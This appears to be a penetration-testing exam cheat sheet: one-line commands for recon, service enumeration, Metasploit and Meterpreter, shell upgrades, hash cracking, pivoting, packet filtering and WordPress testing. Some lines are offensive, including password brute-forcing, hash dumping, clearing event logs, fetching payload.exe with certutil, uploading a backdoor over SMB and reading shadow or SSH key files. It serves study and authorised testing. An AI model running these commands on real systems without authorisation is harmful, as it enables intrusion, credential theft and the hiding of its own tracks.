exam preparation.
- Networking
- Connect and Scan
- Information Gathering
- Host Discovery and Scanning
- SMB Enumeration
- FTP Enumeration
- SSH Enumeration
- HTTP Enumeration
- SQL Enumeration
- SMTP Enumeration
- Vulnerability Assessment
- Metasploit Basics
- Windows Enumeration
- Linux Enumeration
- File Transfer
- Shells and TTY
- Password Cracking
- Pivoting
- Wireshark and TShark
- Web Application Testing
- WordPress Notes
- Drupal Notes
- Quick Workflow
### Linux `ip route` → Show the routing table and reachable networks.
route print → Display the Windows routing table.
netstat -r → Show the kernel routing table.
ip a → Show all network interfaces and IP addresses.
ip -br -c a → Show interfaces in brief colored format.
ipconfig /all → Display full network configuration.
ifconfig → Show network interface information.
ip neighbour → Show ARP / neighbor table entries.
arp -a → Display the ARP cache.
arp → Show ARP table entries.
netstat -tunp → Show active TCP/UDP connections with process info.
netstat -tulpn → Show listening TCP/UDP ports and processes.
ss -tnl → Show listening TCP ports using a modern alternative to netstat.
netstat -ano → Show active connections and listening ports with PID.
netstat -p tcp -p udp → Show TCP and UDP connections.
lsof -n -i4TCP -i4UDP → List open IPv4 TCP and UDP sockets.
nc -v example.com 80 → Connect to a remote TCP port with verbose output.
openssl s_client -connect <HOST>:<PORT> → Connect to a TLS/SSL service and inspect the certificate.
openssl s_client -connect <HOST>:<PORT> -debug → Show detailed TLS debug output.
openssl s_client -connect <HOST>:<PORT> -state → Show TLS state transitions.
openssl s_client -connect <HOST>:<PORT> -quiet → Connect quietly to a TLS service.
nc -zv <HOST> <PORT> → Check whether a TCP port is open without sending data.
host <HOST> → Resolve a hostname to IP or DNS records.
whatweb <HOST> → Identify web technologies used by a target.
whois <HOST> → Retrieve domain registration details.
whois <IP> → Retrieve IP registration / ASN information.
dnsrecon -d <HOST> → Enumerate DNS records and perform DNS reconnaissance.
wafw00f -l → List supported WAF fingerprints.
wafw00f <HOST> -a → Detect whether a web application firewall is present.
sublist3r -d <HOST> → Discover subdomains using OSINT sources.
theHarvester -d <HOST> → Gather emails, subdomains, and hosts from public sources.
theHarvester -d <HOST> -b all → Query all supported OSINT sources.
site: → Restrict results to a specific site.
inurl: → Search for a string inside the URL.
site:*.sitename.com → Search across subdomains.
intitle: → Search for a string in the page title.
filetype: → Search specific file extensions.
intitle:index of → Find directory listings.
cache: → Show cached page versions.
inurl:auth_user_file.txt → Look for exposed authentication files.
inurl:passwd.txt → Look for exposed password files.
inurl:wp-config.bak → Look for exposed WordPress backup config files.
sudo nano /etc/hosts → Edit local hostname resolution entries.
dnsenum <HOST> → Enumerate DNS records and subdomains.
dig <HOST> → Query DNS records for a host.
dig axfr @DNS-server-name <HOST> → Attempt a DNS zone transfer.
fierce --domain <HOST> → Perform DNS reconnaissance and subdomain discovery.
sudo nmap -sn <TARGET_IP/NETWORK> → Perform host discovery without port scanning.
netdiscover -i eth1 -r <TARGET_IP/NETWORK> → Discover live hosts with ARP requests.
sudo arp-scan -I eth1 <TARGET_IP/NETWORK> → Scan a local subnet using ARP.
ping <TARGET_IP> → Check whether a host is reachable.
tracert google.com → Trace the route to a host on Windows.
traceroute google.com → Trace the route to a host on Linux.
fping -I eth1 -g <TARGET_IP/NETWORK> -a → Discover alive hosts in a subnet.
fping -I eth1 -g <TARGET_IP/NETWORK> -a 2>/dev/null → Discover alive hosts and suppress errors.
nmap <TARGET_IP> → Scan common ports on a target.
nmap -Pn <TARGET_IP> → Skip host discovery and assume the target is alive.
nmap -sn <TARGET_IP>/<SUB> > hosts.txt → Perform host discovery and save results to a file.
nmap -sn -T4 <TARGET_IP>/<SUB> -oG - | awk '/Up$/{print $2}' → Extract alive hosts from grepable output.
nmap -p- <TARGET_IP> → Scan all 65535 TCP ports.
nmap -Pn -sV -T4 -A -oN ports.txt -p- -iL hosts.txt --open → Scan all ports on multiple hosts and save results.
nmap -p 80 <TARGET_IP> → Scan port 80 only.
nmap -p 80,445,3389,8080 <TARGET_IP> → Scan a custom list of ports.
nmap -p1-2000 <TARGET_IP> → Scan a custom port range.
nmap -F <TARGET_IP> -v → Perform a fast scan with verbose output.
nmap -sU <TARGET_IP> → Scan UDP ports.
nmap -sV <TARGET_IP> → Detect service versions.
sudo nmap -sV -O <TARGET_IP> → Detect services and operating system.
nmap -sC <TARGET_IP> → Run default NSE scripts.
nmap -Pn -F -sV -O -sC <TARGET_IP> → Combine fast scan, service detection, OS detection, and scripts.
nmap -Pn -F -A <TARGET_IP> → Run aggressive scan.
nmap -Pn -F -T5 -sV -O -sC <TARGET_IP> -v → Use very fast timing with service and OS detection.
nmap -Pn -F -oN outputfile.txt <TARGET_IP> → Save output in normal format.
nmap -Pn -F -oX outputfile.xml <TARGET_IP> → Save output in XML format.
nmap -Pn -sV -sC -O -oA outputfile <TARGET_IP> → Save output in all major formats.
nmap -A -oA outputfile <TARGET_IP> → Save aggressive scan output in all formats.
sudo nmap -p 445 -sV -sC -O <TARGET_IP> → Scan SMB with service, scripts, and OS detection.
nmap -p 445 --script smb-protocols <TARGET_IP> → Detect supported SMB protocol versions.
nmap -p 445 --script smb-security-mode <TARGET_IP> → Check SMB security mode settings.
nmap -p 445 --script smb-enum-sessions <TARGET_IP> → Enumerate active SMB sessions.
nmap -p 445 --script smb-enum-sessions --script-args smbusername=<USER>,smbpassword=<PW> <TARGET_IP> → Enumerate SMB sessions with credentials.
nmap -p 445 --script smb-enum-shares <TARGET_IP> → Enumerate SMB shares.
nmap -p 445 --script smb-enum-shares --script-args smbusername=<USER>,smbpassword=<PW> <TARGET_IP> → Enumerate shares with credentials.
nmap -p 445 --script smb-enum-users --script-args smbusername=<USER>,smbpassword=<PW> <TARGET_IP> → Enumerate SMB users with credentials.
nmap -p 445 --script smb-server-stats --script-args smbusername=<USER>,smbpassword=<PW> <TARGET_IP> → Retrieve SMB server stats.
nmap -p 445 --script smb-enum-domains --script-args smbusername=<USER>,smbpassword=<PW> <TARGET_IP> → Enumerate domains.
nmap -p 445 --script smb-enum-groups --script-args smbusername=<USER>,smbpassword=<PW> <TARGET_IP> → Enumerate groups.
nmap -p 445 --script smb-enum-services --script-args smbusername=<USER>,smbpassword=<PW> <TARGET_IP> → Enumerate services over SMB.
nmap -p 445 --script smb-enum-shares,smb-ls --script-args smbusername=<USER>,smbpassword=<PW> <TARGET_IP> → Enumerate shares and list their contents.
nmap -p 445 --script smb-os-discovery <TARGET_IP> → Identify SMB host OS information.
nmap -p445 --script=smb-vuln-* <TARGET_IP> → Run SMB vulnerability detection scripts.
nmblookup -A <TARGET_IP> → Query NetBIOS name information.
smbmap -u guest -p "" -d . -H <TARGET_IP> → Enumerate SMB shares as guest.
smbmap -u <USER> -p '<PW>' -d . -H <TARGET_IP> → Enumerate SMB shares with credentials.
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -x 'ipconfig' → Execute a command remotely over SMB.
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -L → List all drives / shares.
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -r 'C$' → Recursively list a share or drive.
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> --upload '/root/sample_backdoor' 'C$\sample_backdoor' → Upload a file to a writable SMB path.
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> --download 'C$\flag.txt' → Download a remote file.
smbclient -L <TARGET_IP> -N → List shares using anonymous login.
smbclient -L <TARGET_IP> -U <USER> → List shares with credentials.
smbclient //<TARGET_IP>/<USER> -U <USER> → Connect to a user share.
smbclient //<TARGET_IP>/admin -U admin → Connect to the admin share.
smbclient //<TARGET_IP>/public -N → Connect to a public share anonymously.
help → Show SMBClient help.
ls → List files in the current share.
get <filename> → Download a file from the share.
rpcclient -U "" -N <TARGET_IP> → Connect with a null session.
enumdomusers → Enumerate domain users.
enumdomgroups → Enumerate domain groups.
lookupnames admin → Resolve account details for a given name.
enum4linux -o <TARGET_IP> → Enumerate OS information.
enum4linux -U <TARGET_IP> → Enumerate users.
enum4linux -S <TARGET_IP> → Enumerate shares.
enum4linux -G <TARGET_IP> → Enumerate groups.
enum4linux -i <TARGET_IP> → Enumerate printer and share info.
enum4linux -r -u "<USER>" -p "<PW>" <TARGET_IP> → RID cycling with credentials.
enum4linux -a -u "<USER>" -p "<PW>" <TARGET_IP> → Run all major checks with credentials.
enum4linux -U -M -S -P -G <TARGET_IP> → Enumerate users, machines, shares, policies, and groups.
enum4linux -n <TARGET_IP> → Check whether the target may allow a null session.
enum4linux <TARGET_IP> → Run further enumeration if null session is suspected.
smbclient -L WORKGROUP -I <TARGET_IP> -N -U "" → List shares using a null session.
smbclient \\\\<TARGET_IP>\\c$ -N -U "" → Attempt anonymous connection to a share.
smb: \> get file_shared.txt → Download a file from the share.
gzip -d /usr/share/wordlists/rockyou.txt.gz → Uncompress the RockYou wordlist.
hydra -l admin -P /usr/share/wordlists/rockyou.txt <TARGET_IP> smb → Attempt SMB password guessing for a single user.
msfconsole → Start Metasploit.
msfconsole -q → Start Metasploit quietly.
use auxiliary/scanner/smb/smb_version → Detect SMB version.
use auxiliary/scanner/smb/smb_enumusers → Enumerate SMB users.
use auxiliary/scanner/smb/smb_enumshares → Enumerate SMB shares.
use auxiliary/scanner/smb/smb_login → Test SMB credentials.
use auxiliary/scanner/smb/pipe_auditor → Enumerate accessible named pipes.
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt → Set a password file.
set SMBUser <USER> → Set the SMB username.
set RHOSTS <TARGET_IP> → Set target host(s).
exploit → Run the selected module.
sudo nmap -p 21 -sV -sC -O <TARGET_IP> → Scan FTP with version detection and default scripts.
nmap -p 21 -sV -O <TARGET_IP> → Scan FTP and identify OS.
nmap -p 21 --script ftp-anon <TARGET_IP> → Check whether anonymous login is allowed.
nmap -p 21 --script ftp-brute --script-args userdb=<USERS_LIST> <TARGET_IP> → Attempt FTP credential guessing.
ftp <TARGET_IP> → Connect to an FTP server.
ls → List files in the current FTP directory.
cd /../.. → Move across directories.
get <filename> → Download a file.
put <filename> → Upload a file.
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <TARGET_IP> -t 4 ftp → Attempt FTP credential guessing with multiple users and passwords.
sudo nmap -p 22 -sV -sC -O <TARGET_IP> → Scan SSH with default scripts and OS detection.
nmap -p 22 --script ssh2-enum-algos <TARGET_IP> → Enumerate supported SSH algorithms.
nmap -p 22 --script ssh-hostkey --script-args ssh_hostkey=full <TARGET_IP> → Retrieve host key details.
nmap -p 22 --script ssh-auth-methods --script-args="ssh.user=<USER>" <TARGET_IP> → Enumerate supported auth methods for a user.
nmap -p 22 --script=ssh-brute --script-args userdb=<USERS_LIST> <TARGET_IP> → Attempt SSH password guessing.
nc <TARGET_IP> <TARGET_PORT> → Connect to a TCP port manually.
nc <TARGET_IP> 22 → Connect to the SSH port manually.
ssh <USER>@<TARGET_IP> 22 → Connect to SSH as a specific user.
ssh root@<TARGET_IP> 22 → Connect as root if allowed.
hydra -l <USER> -P /usr/share/wordlists/rockyou.txt <TARGET_IP> ssh → Attempt SSH password guessing for one user.
use auxiliary/scanner/ssh/ssh_login → Test SSH logins.
set RHOSTS <TARGET_IP> → Set target host(s).
set USERPASS_FILE /usr/share/wordlists/metasploit/root_userpass.txt → Set combined user/password list.
set STOP_ON_SUCCESS true → Stop after the first successful login.
set VERBOSE true → Enable verbose output.
exploit → Run the module.
sudo nmap -p 80 -sV -O <TARGET_IP> → Scan HTTP and detect OS.
nmap -p 80 --script=http-enum -sV <TARGET_IP> → Enumerate common web paths.
nmap -p 80 --script=http-headers -sV <TARGET_IP> → Retrieve HTTP headers.
nmap -p 80 --script=http-methods --script-args http-methods.url-path=/webdav/ <TARGET_IP> → Check enabled HTTP methods for a path.
nmap -p 80 --script=http-webdav-scan --script-args http-methods.url-path=/webdav/ <TARGET_IP> → Check for WebDAV exposure.
whatweb <TARGET_IP> → Identify web technologies.
http <TARGET_IP> → Send an HTTP request using HTTPie.
browsh --startup-url http://<TARGET_IP> → Open a site in a terminal browser.
dirb http://<TARGET_IP> → Discover hidden directories and files.
dirb http://<TARGET_IP> /usr/share/metasploit-framework/data/wordlists/directory.txt → Run DIRB with a custom wordlist.
wget <TARGET_IP> → Download web content.
curl <TARGET_IP> | more → Fetch and page through response content.
curl -I http://<TARGET_IP>/<DIR> → Show only response headers.
curl --digest -u <USER>:<PW> http://<TARGET_IP>/<DIR> → Send an HTTP Digest Auth request.
lynx <TARGET_IP> → Browse a site from the terminal.
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-head /admin/ → Attempt HTTP Basic Auth password guessing.
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-get /admin/ → Attempt HTTP Digest Auth password guessing.
hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed" → Attempt HTTP form password guessing.
hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed:H=Cookie\: PHPSESSID=if0kg4ss785kmov8bqlbusva3v" → Attempt password guessing on an authenticated form flow.
use auxiliary/scanner/http/brute_dirs → Brute-force directories.
use auxiliary/scanner/http/robots_txt → Retrieve robots.txt entries.
use auxiliary/scanner/http/http_header → Inspect HTTP headers.
use auxiliary/scanner/http/http_login → Test HTTP logins.
use auxiliary/scanner/http/http_version → Retrieve HTTP server version.
setg RHOSTS <TARGET_IP> → Set global target hosts.
setg RHOST <TARGET_IP> → Set global single target host.
set HTTP_METHOD GET → Set the HTTP method.
set TARGETURI /<DIR>/ → Set target URI path.
set USER_FILE <USERS_LIST> → Set user wordlist.
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt → Set password wordlist.
set VERBOSE false → Disable verbose output.
set AUTH_URI /<DIR>/ → Set auth URI.
exploit → Run the module.
sudo nmap -p 3306 -sV -O <TARGET_IP> → Scan MySQL and detect OS.
nmap -p 3306 --script=mysql-empty-password <TARGET_IP> → Check for empty MySQL passwords.
nmap -p 3306 --script=mysql-info <TARGET_IP> → Retrieve MySQL version and status info.
nmap -p 3306 --script=mysql-users --script-args="mysqluser='<USER>',mysqlpass='<PW>'" <TARGET_IP> → Enumerate MySQL users.
nmap -p 3306 --script=mysql-databases --script-args="mysqluser='<USER>',mysqlpass='<PW>'" <TARGET_IP> → Enumerate databases.
nmap -p 3306 --script=mysql-variables --script-args="mysqluser='<USER>',mysqlpass='<PW>'" <TARGET_IP> → Retrieve MySQL server variables.
nmap -p 3306 --script=mysql-dump-hashes --script-args="username='<USER>',password='<PW>'" <TARGET_IP> → Dump MySQL password hashes.
nmap -p 3306 --script=mysql-query --script-args="query='select count(*) from <DB_NAME>.<TABLE_NAME>;',username='<USER>',password='<PW>'" <TARGET_IP> → Execute a SQL query.
nmap -sV -sC -p 1433 <TARGET_IP> → Scan MSSQL with version detection and default scripts.
nmap -p 1433 --script ms-sql-info <TARGET_IP> → Retrieve MSSQL instance information.
nmap -p 1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 <TARGET_IP> → Enumerate NTLM info from MSSQL.
nmap -p 1433 --script ms-sql-empty-password <TARGET_IP> → Check for empty MSSQL passwords.
mysql -h <TARGET_IP> -u <USER> → Connect to MySQL as a given user.
mysql -h <TARGET_IP> -u root → Connect as root.
help → Show MySQL client help.
show databases; → List databases.
use <DB_NAME>; → Select a database.
select count(*) from <TABLE_NAME>; → Count table rows.
select load_file("/etc/shadow"); → Try reading a file via MySQL if permissions allow.
hydra -l <USER> -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <TARGET_IP> mysql → Attempt MySQL password guessing.
use auxiliary/scanner/mysql/mysql_schemadump → Dump MySQL schema info.
use auxiliary/scanner/mysql/mysql_writable_dirs → Find writable directories.
use auxiliary/scanner/mysql/mysql_file_enum → Enumerate accessible files.
use auxiliary/scanner/mysql/mysql_hashdump → Dump MySQL hashes.
use auxiliary/scanner/mysql/mysql_login → Test MySQL credentials.
use auxiliary/scanner/mssql/mssql_login → Test MSSQL credentials.
use auxiliary/admin/mssql/mssql_enum → Enumerate MSSQL server info.
use auxiliary/admin/mssql/mssql_enum_sql_logins → Enumerate SQL logins.
use auxiliary/admin/mssql/mssql_exec → Execute commands via MSSQL when possible.
use auxiliary/admin/mssql/mssql_enum_domain_accounts → Enumerate domain accounts from MSSQL.
sudo nmap -p 25 -sV -sC -O <TARGET_IP> → Scan SMTP service.
nmap -sV --script banner <TARGET_IP> → Grab service banners.
nc <TARGET_IP> 25 → Connect manually to SMTP.
telnet <TARGET_IP> 25 → Connect manually to SMTP.
HELO attacker.xyz → Initiate SMTP session.
EHLO attacker.xyz → Request extended SMTP capabilities.
smtp-user-enum -U /usr/share/commix/src/txt/usernames.txt -t <TARGET_IP> → Enumerate valid SMTP users.
service postgresql start && msfconsole -q → Start PostgreSQL and Metasploit quietly.
setg RHOSTS <TARGET_IP> → Set global target hosts.
setg RHOST <TARGET_IP> → Set global target host.
use auxiliary/scanner/smtp/smtp_enum → Enumerate SMTP users or server behavior.
nmap -sV --script ssl-enum-ciphers -p <SECURED_PORT> <TARGET> → Enumerate SSL/TLS ciphers.
nmap -sV --script ssl-heartbleed -p 443 <TARGET_IP> → Check for Heartbleed.
nmap --script smb-vuln-ms17-010 -p 445 <TARGET_IP> → Check for MS17-010.
msfconsole → Start Metasploit.
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce → Load the BlueKeep module.
nmap --script log4shell.nse --script-args log4shell.callback-server=<CALLBACK_SERVER_IP>:1389 -p 8080 <TARGET_IP> → Probe for Log4Shell behavior in a controlled environment.
searchsploit badblue 2.7 → Search Exploit-DB for BadBlue 2.7 related entries.
service postgresql start && msfconsole -q → Start Metasploit with database support.
db_status → Check database connection status.
help → Show help.
version → Show Metasploit version.
show -h → Show available show options.
show all → Show all module categories.
show exploits → List exploit modules.
show payloads → List payloads.
search <STRING> → Search modules by keyword.
search cve:2017 type:exploit platform:windows → Search exploit modules by CVE, type, and platform.
use <MODULE_NAME> → Select a module.
show options → Show module options.
set <OPTION> <VALUE> → Set a module option.
run → Execute the module.
execute → Alias for run.
exploit → Execute the module.
sessions → List active sessions.
sessions 1 → Interact with session 1.
sessions -n xoda -i 1 → Rename session 1.
sessions -C sysinfo -i 1 → Run a Meterpreter command against a session.
sessions -k 1 → Kill session 1.
sessions -K → Kill all sessions.
sessions -u 1 → Upgrade a shell to Meterpreter when supported.
workspace → List workspaces.
workspace -a <NEW_WORKSPACE> → Add a new workspace.
workspace <WORKSPACE_NAME> → Switch to a workspace.
workspace -d <WORKSPACE_NAME> → Delete a workspace.
db_import <XML_FILE_NAME> → Import Nmap XML results.
hosts → List hosts in the database.
services → List services.
vulns → List vulnerabilities.
loot → Show collected loot.
creds → Show collected credentials.
notes → Show notes.
db_nmap -Pn -sV -O <TARGET_IP> → Run Nmap from inside Metasploit and import results automatically.
background → Send current Meterpreter session to background.
cat → Read a file.
cd → Change directory.
checksum md5 /bin/bash → Calculate an MD5 checksum.
clearev → Clear Windows event logs.
download Filename /root/... → Download a file from target to attacker.
edit → Edit a file.
execute -f ifconfig → Run a program on the target.
getenv → Show environment variables.
getenv PATH → Show PATH environment variable.
getuid → Show current user context.
hashdump → Dump password hashes where supported.
idletime → Show user idle time.
ifconfig → Show network interfaces on target.
lpwd → Show local working directory.
ls → List files.
migrate → Move Meterpreter into another process.
mkdir → Create a directory.
ps → Show running processes.
pwd → Show current directory.
resource <file.txt> → Run commands from a resource file.
rmdir → Remove a directory.
search -f *.txt → Search for files.
shell → Drop into a system shell.
sysinfo → Show target system information.
upload /path/file.exe C://Windows → Upload a file to the target.
systeminfo → Show OS and system details.
hostname → Show the computer name.
wmic qfe get Caption,Description,HotFixID,InstalledOn → List installed patches.
whoami → Show current user.
whoami /priv → Show current privileges.
query user → Show logged-in users.
net users → List local users.
net user <USER> → Show details for a user.
net localgroup → List local groups.
net localgroup Administrators → List local admins.
net localgroup "Remote Desktop Users" → List RDP users.
ipconfig → Show IP config.
ipconfig /all → Show detailed network config.
route print → Show routing table.
arp -a → Show ARP cache.
netstat -ano → Show connections and PIDs.
netsh firewall show state → Show firewall state.
netsh advfirewall show allprofiles → Show all firewall profile settings.
net start → Show started services.
wmic service list brief → List services briefly.
tasklist /SVC → Show running tasks and services.
schtasks /query /fo LIST → List scheduled tasks.
schtasks /query /fo LIST /v → List tasks verbosely.
fsutil fsinfo drives → List drives.
whoami → Show current user.
cat /etc/*release → Show Linux distribution info.
uname -a → Show kernel and architecture.
uname -r → Show kernel version.
cat /etc/passwd → Show local users and service accounts.
find / -name "flag" → Search for a file named flag.
hostname → Show hostname.
cat /etc/*issue → Show banner / distribution info.
dpkg -l → List installed packages on Debian-based systems.
env → Show environment variables.
lscpu → Show CPU info.
free -h → Show memory usage.
df -h → Show disk usage.
lsblk -l → Show block devices.
lsblk | grep sd → Show block devices matching sd.
ls -lah /home → List user home directories.
cat /etc/passwd | grep -v /nologin → Show interactive users.
groups <USER> → Show groups for a user.
groups root → Show root's groups.
groups → Show current user groups.
who → Show logged-in users.
w → Show logged-in users and activity.
last → Show login history.
lastlog → Show last login for all users.
ifconfig → Show interfaces.
ip -br -c a → Show interfaces in brief format.
ip a → Show interfaces and addresses.
cat /etc/networks → Show network names database.
cat /etc/hostname → Show hostname file.
cat /etc/hosts → Show local host mappings.
cat /etc/resolv.conf → Show DNS resolver config.
arp -a → Show ARP entries.
ps → Show running processes.
ps aux → Show detailed process list.
ps aux | grep root → Search for root-owned processes.
top → Show interactive process list.
cat /etc/cron* → Show cron-related files.
crontab -l → List user cron jobs.
netstat -antp → Show network connections with processes.
ss -tnl → Show listening TCP sockets.
python -V → Show Python version.
python3 -V → Show Python 3 version.
py -v → Show Python launcher info on Windows.
python -m SimpleHTTPServer <PORT_NUMBER> → Start a Python 2 HTTP server.
python3 -m http.server <PORT_NUMBER> → Start a Python 3 HTTP server.
python -m http.server <PORT> → Start a simple HTTP server if supported.
py -3 -m http.server <PORT> → Start a Python 3 HTTP server on Windows.
certutil -urlcache -f http://<TARGET_IP>/payload.exe payload.exe → Download a file on Windows using certutil.
scp <USER>@<TARGET_IP>:~/.ssh/id_rsa . → Copy a remote file locally via SCP.
/bin/bash -i → Spawn an interactive Bash shell.
/bin/sh -i → Spawn an interactive sh shell.
python -c 'import pty; pty.spawn("/bin/bash")' → Upgrade a shell using Python PTY.
python3 -c 'import pty; pty.spawn("/bin/bash")' → Upgrade a shell with Python 3.
stty raw -echo && fg → Fix terminal behavior after backgrounding a shell.
reset → Reset terminal state.
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin → Set a useful PATH.
export TERM=xterm → Set terminal type.
export SHELL=/bin/bash → Set default shell.
stty rows 36 columns 157 → Match terminal dimensions.
SHELL=/bin/bash script -q /dev/null → Spawn a more stable interactive shell.
perl -e 'exec "/bin/bash";' → Spawn Bash via Perl.
john --list=formats | grep NT → Show NT-compatible formats.
john --format=NT hashes.txt → Crack NT hashes.
john <Hash_File> --wordlist=/usr/share/wordlists/rockyou.txt → Crack hashes with RockYou.
john --format=NT win_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt → Crack Windows NT hashes.
unshadow passwd shadow > unshadowed.txt → Combine passwd and shadow files for cracking.
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt → Crack combined Linux credentials.
hashcat -a 3 -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt → Attempt cracking NT hashes.
hashcat -a 3 -m 1000 --show hashes.txt /usr/share/wordlists/rockyou.txt → Show cracked results.
hashcat --help | grep 1800 → Find SHA-512 crypt mode.
hashcat -a 3 -m 1800 linux.hashes.txt /usr/share/wordlists/rockyou.txt → Attempt cracking Linux SHA-512 crypt hashes.
ip route → Show routes on Linux.
route → Show routes on Linux using legacy tool.
route print → Show routes on Windows.
ip route add <subnet> via <gateway> → Add a route to an internal subnet through a pivot host.
ip route add 192.168.222.0/24 via 10.172.24.1 → Example manual route addition.
run autoroute -s <TARGET1_SUBNET_NETWORK> → Add a route through the compromised host.
run autoroute -p → Show active Meterpreter routes.
run arp_scanner -r <TARGET1_SUBNET_NETWORK> → ARP scan through the pivot host.
use auxiliary/scanner/portscan/tcp → Load TCP port scanner.
set RHOSTS <TARGET2_IP> → Set internal target.
set PORTS 1-100 → Set ports to scan.
run → Start the scan.
portfwd add -l <LOCAL_PORT> -p <TARGET_PORT> -r <TARGET_IP> → Forward a local port to a remote internal service.
db_nmap -sS -sV -p <LOCAL_PORT> localhost → Scan a forwarded service from localhost.
wireshark -i eth1 → Start Wireshark on interface eth1.
ip.addr == 10.10.10.9 → Filter packets by IP.
ip.dest == 10.10.10.15 → Filter by destination IP.
ip.src == 10.10.16.33 → Filter by source IP.
tcp.port == 25 → Filter by TCP port.
ip.addr == 10.10.14.22 and tcp.port == 8080 → Filter by IP and TCP port.
tcp.flags.syn == 1 and tcp.flags.ack == 0 → Filter SYN packets.
eth.dst == ff:ff:ff:ff:ff:ff → Filter Ethernet broadcast packets.
tshark -D → List available capture interfaces.
tshark -i eth1 → Capture traffic on eth1.
tshark -r <FILE>.pcap → Read packets from a pcap file.
tshark -r <FILE>.pcap | wc -l → Count packets in a pcap.
tshark -r <FILE>.pcap -c 100 → Show the first 100 packets.
tshark -r <FILE>.pcap -z io,phs -q → Show protocol hierarchy statistics.
tshark -r <FILE>.pcap -Y 'http' | more → Show HTTP traffic.
tshark -r <FILE>.pcap -Y "http.request.method==GET" → Show only GET requests.
tshark -r <FILE>.pcap -Y "http.request.method==GET" -Tfields -e frame.time -e ip.src -e http.request.full_uri → Extract time, source IP, and full URI for GET requests.
tshark -r <FILE>.pcap -Y "http contains password" → Search for HTTP packets containing the string "password".
tshark -r <FILE>.pcap -Y "http.request.method==GET && http.host==<TARGET_URL>" -Tfields -e ip.dst → Extract destination IP for GET requests to a target host.
tshark -r <FILE>.pcap -Y "ip.src==<IP> && http" -Tfields -e http.user_agent → Show user agents from a source IP.
tshark -r <FILE>.pcap -Y "wlan" → Show Wi-Fi traffic.
tshark -r <FILE>.pcap -Y "wlan.fc.type_subtype==0x000c" → Show deauthentication frames.
tshark -r <FILE>.pcap -Y "wlan.fc.type_subtype==0x000c" -Tfields -e wlan.ra → Extract receiver MACs from deauth frames.
tshark -r <FILE>.pcap -Y "eapol" → Show WPA handshake packets.
tshark -r <FILE>.pcap -Y "wlan.fc.type_subtype==8" -Tfields -e wlan.ssid -e wlan.bssid → Extract SSID and BSSID from beacon frames.
tshark -r <FILE>.pcap -Y "wlan.ssid==<SSID>" -Tfields -e wlan.bssid → Find BSSID for a given SSID.
tshark -r <FILE>.pcap -Y "wlan.ssid==<SSID>" -Tfields -e wlan_radio.channel → Show the Wi-Fi channel for an SSID.
dirb http://<TARGET_IP> → Brute-force web directories.
curl -I <TARGET_IP> → Show HTTP headers.
curl -X GET <TARGET_IP> → Send a GET request.
curl -X OPTIONS <TARGET_IP> -v → Show supported methods and response details.
curl -X POST <TARGET_IP> → Send a POST request.
curl -X POST <TARGET_IP>/login.php -d "name=john&password=password" -v → Send login data in a POST request.
curl -X PUT <TARGET_IP> → Send a PUT request.
curl <TARGET_IP>/uploads/ --upload-file hello.txt → Upload a file if PUT is allowed.
curl -X DELETE <TARGET_IP>/uploads/hello.txt -v → Attempt file deletion if DELETE is allowed.
gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txt -b 403,404 → Discover directories while ignoring common negative status codes.
gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txt -b 403,404 -x .php,.xml,.txt -r → Discover files with extensions and follow redirects.
gobuster dir -u http://<TARGET_IP>/data -w /usr/share/wordlists/dirb/common.txt -b 403,404 -x .php,.xml,.txt -r → Enumerate a specific path recursively.
ffuf -w wordlist.txt -u http://example.com/FUZZ → Discover directories or endpoints.
ffuf -w wordlist.txt -u http://example.com/FUZZ -e .aspx,.php,.txt,.html → Discover files by extension.
ffuf -w /usr/share/wordlists/dirb/small.txt -u http://example.com/FUZZ -mc 200,301 → Match specific status codes.
ffuf -w wordlist.txt -u http://example.com/FUZZ -maxtime 60 → Stop fuzzing after a maximum time.
ffuf -w wordlist.txt -u http://example.com/FUZZ -t 64 → Set thread count.
nikto -h http://<TARGET_IP> -o niktoscan.txt → Scan a web server and save results.
nikto -h http://<TARGET_IP>/index.php?page=arbitrary-file-inclusion.php -Tuning 5 -o nikto.html -Format htm → Focus on specific Nikto checks and export HTML.
wpscan --url http://<TARGET_IP> --enumerate u → Enumerate WordPress users.
wpscan --url http://<TARGET_IP> -e vp --plugins-detection mixed --api-token API_TOKEN → Enumerate vulnerable plugins.
wpscan --url http://<TARGET_IP> -e u --passwords /usr/share/wordlists/rockyou.txt → Attempt WordPress login password testing.
wpscan --url http://<TARGET_IP> -U admin -P /usr/share/wordlists/rockyou.txt → Attempt WordPress password testing for a single user.
/wp-login.php → Default login page.
/wp-admin/ → Default admin panel.
/wp-content/uploads/ → Uploaded files directory.
/wp-content/themes/ → Theme files directory.
/wp-config.php → WordPress configuration file with DB settings.
curl https://victim.com/ | grep 'content="WordPress' → Check page source for WordPress version hints.
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' → Look for plugin references.
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' → Look for theme references.
curl -s -I -X GET http://blog.example.com/?author=1 → Test whether a WordPress author ID exists.
curl http://blog.example.com/wp-json/wp/v2/users → Query REST API for users if exposed.
wpscan --url "http://<TARGET_IP>" -e t → Enumerate installed themes.
wpscan --url "http://<TARGET_IP>" -e vt → Enumerate vulnerable themes.
